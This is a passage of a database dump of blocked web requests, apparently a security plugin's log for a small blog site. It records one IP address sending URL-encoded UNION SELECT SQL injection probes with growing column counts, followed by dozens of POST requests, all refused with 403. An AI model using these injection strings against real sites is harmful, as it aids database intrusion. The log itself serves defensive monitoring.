ssr)\"}','YgnXThOq3WCk2RMfrcIFZ4G8',0,1637215932.6229,473,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','9LH7ZGqTXURS4coK6inQBjyt',0,1637215934.5263,471,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8oVKvad5J06AwYg9eEFxINqL',0,1637215936.2116,493,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','PfZk3QFeAsGuqITh0cHmltgD',0,1637215937.6378,452,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ybkeY3gN9UESiwmcnMvPxzrW',0,1637215939.3471,522,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ZiEcjoWeABX1uLy9CItkxfV2',0,1637215948.0716,791,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','AG25ZRStIrpfoOs9643vhbyE',0,1637215950.4218,445,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','aJg0obCdeDczS8s1lRYOH65f',0,1637215952.5072,472,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','HlF3Nr9gVUe8f4cztiZjLDKW',0,1637215954.0727,450,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','4nzOgBqtmQrvTI1UGfLJaxZc',0,1637215955.9408,450,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','7opQr4t8im0u2TkgZJ1vWdNs',0,1637215957.6987,507,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','qWG2XRcDn3xSfYP1o90lgmK4',0,1637215959.3150,463,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','pr60xVsoQtbWnSwA8YOGkmeL',0,1637215960.7661,785,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','7pMbAQP9XJ4ZYijmDuVTsyF8',0,1637215963.2785,713,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','SCDTqxUJwmKLFRZ7yhQfrsGa',0,1637215965.1285,425,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','7Y0fHeL9GmlnUSBwa4zIVD6P',0,1637215979.1787,473,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','4LIM8R1BjDKqYZymhi2HuOwT',0,1637215980.7142,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','d450C3pmay9HP7f6zviqwb2E',0,1637215982.7620,463,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','G4wWQNbEzUR7t8jMVlF2yo1T',0,1637215984.5147,428,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','cThzxvoYPjtmGk8SuH3gWyVM',0,1637215987.9288,774,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','3Qx4pNjTFwl2ZoAO75WcKy6r',0,1637215990.1923,450,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','OcIBpJ4tT7EnLag59q8dZkXv',0,1637215991.8865,437,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','2HEdiCZQv68ANkJgly09q14W',0,1637215993.1377,407,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','E9nSudRgxLcFwPK7rWGUy3AQ',0,1637215994.4061,403,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','CYQfN62EpVKeqXx1awZPF3jW',0,1637215995.7229,448,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','UQsjPpM0hvJklYGrAnaBKft3',0,1637215997.5340,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','B4whS2WjMgaHpPqnICibQmsF',0,1637215998.8185,385,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WZ2DVM8Ob1Qnz7oCNAgHkUBu',0,1637216000.3130,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','uKIUjDayqtfGVH71vkz0icSC',0,1637216001.5937,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Zv2ipJT9Mma3PCNQGdhWwAID',0,1637216002.9302,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','KBZqNMvPcAmLauey0oOn6351',0,1637216003.9166,138,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','2oCtlkEzvHVK7ei5NGL3wJWD',0,1637216004.6375,419,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DybgPO2LeFZEGf7JndzlU3IK',0,1637216005.6351,474,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ZTu8v3VPNoIrd64Sn2MYgFwf',0,1637216006.7589,137,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','9cFSUa4tiu6DN2ZHKkXTh5lI',0,1637216007.4722,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ZCgiFOGmcE8Q0tWKkToud6Yz',0,1637216008.6965,478,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mIvGReXKqFlToEkJdjgOQ6ys',0,1637216010.3578,404,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6LCu3VozHstnRGmqwh247DBl',0,1637216011.6531,376,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','VTb2gHSfZOUvRMsDJuFe1ny0',0,1637216013.0672,451,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','eWSHqMm6iVNycup0rXhBkwx2',0,1637216014.2238,385,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','U6lZ3pWzqdXVP2N4mGCtckxu',0,1637216015.5657,429,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BPWMCEv1Xr9SUA5cFgnm6Nj7',0,1637216016.7341,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','wMzTHeNcyXoblhKDZQrk0AuL',0,1637216018.2676,409,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','jm05BdVIGxi1veR8uyZoscp2',0,1637216019.7483,406,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EvfBCKSJ67ePkRuYVGUmQLtI',0,1637216021.0410,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mb3lGpFONQTYxSZA5LoH8fEv',0,1637216022.2466,425,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QITMfUkSx4hFWeNOw1BPA9m3',0,1637216024.0107,440,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','KxE9nZCiLgFrDcYPAfyXSdBk',0,1637216025.3552,381,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','dTtqSoIekf6nB1P0shAZvKcr',0,1637216026.4651,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','6n8UHh4AcXeKTVP5Q1zJtWom',0,1637216027.5382,423,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ymjHU7IxEzfgROAusoLd4iNF',0,1637216028.7285,454,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','RizejufKom5r3lQbFvJUDpG9',0,1637216029.8565,152,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','qwvkWQJZAjO6BbpRL4mIX97C',0,1637216030.7093,388,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','MwESKVLcfqk82joThe5vXCG4',0,1637216032.3055,160,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','5Gjyb9mKF6TMpP0c2YkhUXWa',0,1637216033.7175,792,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','16tZhwGVOmpodFevYqDQAkgx',0,1637216035.2220,384,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','17iy4uZaWrRxdXqcjA3CN6U0',0,1637216036.5851,370,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','wUElkoiXCdP0658uKxBnfRAN',0,1637216037.7490,678,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','n7m4Hr6lDvFhUXpwuiBVAys3',0,1637216039.1194,425,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','K7Pdsv5YuBLmTG98ctlHpaeq',0,1637216040.4933,391,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','cBiHQGNOIpCRZT3dkeYh5tAg',0,1637216041.6827,393,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','zLNR4G6puJX0PVojcrEk3UlY',0,1637216043.0181,424,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','cCWHX1Tpv6AVnujR9LJyQlGY',0,1637216044.3284,376,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WaQJ5KUptfz2mlOynuoPSx7i',0,1637216045.5424,408,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','aMXv50slpZDnfhJFO7bI62LG',0,1637216046.8332,402,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','FTfRcS4EO7LqVmDCaWsdygZe',0,1637216048.1581,388,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ah7zyM51LQ2lPbw3mXZnGjSH',0,1637216049.5717,388,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','TzmboyArtfiJE2RMa7hVxUd8',0,1637216050.9747,391,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','dpk9aXVBrtxF01Zc56TC7qPK',0,1637216052.5402,490,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oGOq1pWLhNPtMrY8jmvkSHbF',0,1637216054.3193,409,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','m2vA6OYj5GeLNzxt9o8UQqpn',0,1637216055.9444,413,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','809prLMA2ylODh1xcgQ5SvXK',0,1637216057.2864,390,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QF8cHGWid6qrVXl2zemYDsuC',0,1637216058.5823,727,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','uMUKCZx4imkBdH2EcXw5hysD',0,1637216060.7553,383,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','pjTlF5HkmrOzeVf9ugP2Q0aS',0,1637216061.9710,124,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','j3DB4zeW9XASIo81R7UNkPHy',0,1637216062.9893,374,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','uGxWl9pfzVjqT5cFLwt3IQm0',0,1637216064.6391,422,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','pSin4HdusokrOq9VKYhlwUvJ',0,1637216066.1037,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','97BDXvYnxbEk6Gmdo8ih1Su0',0,1637216067.5750,162,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oJtkzILsnmA3W1dBwGX8e06c',0,1637216068.6963,435,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 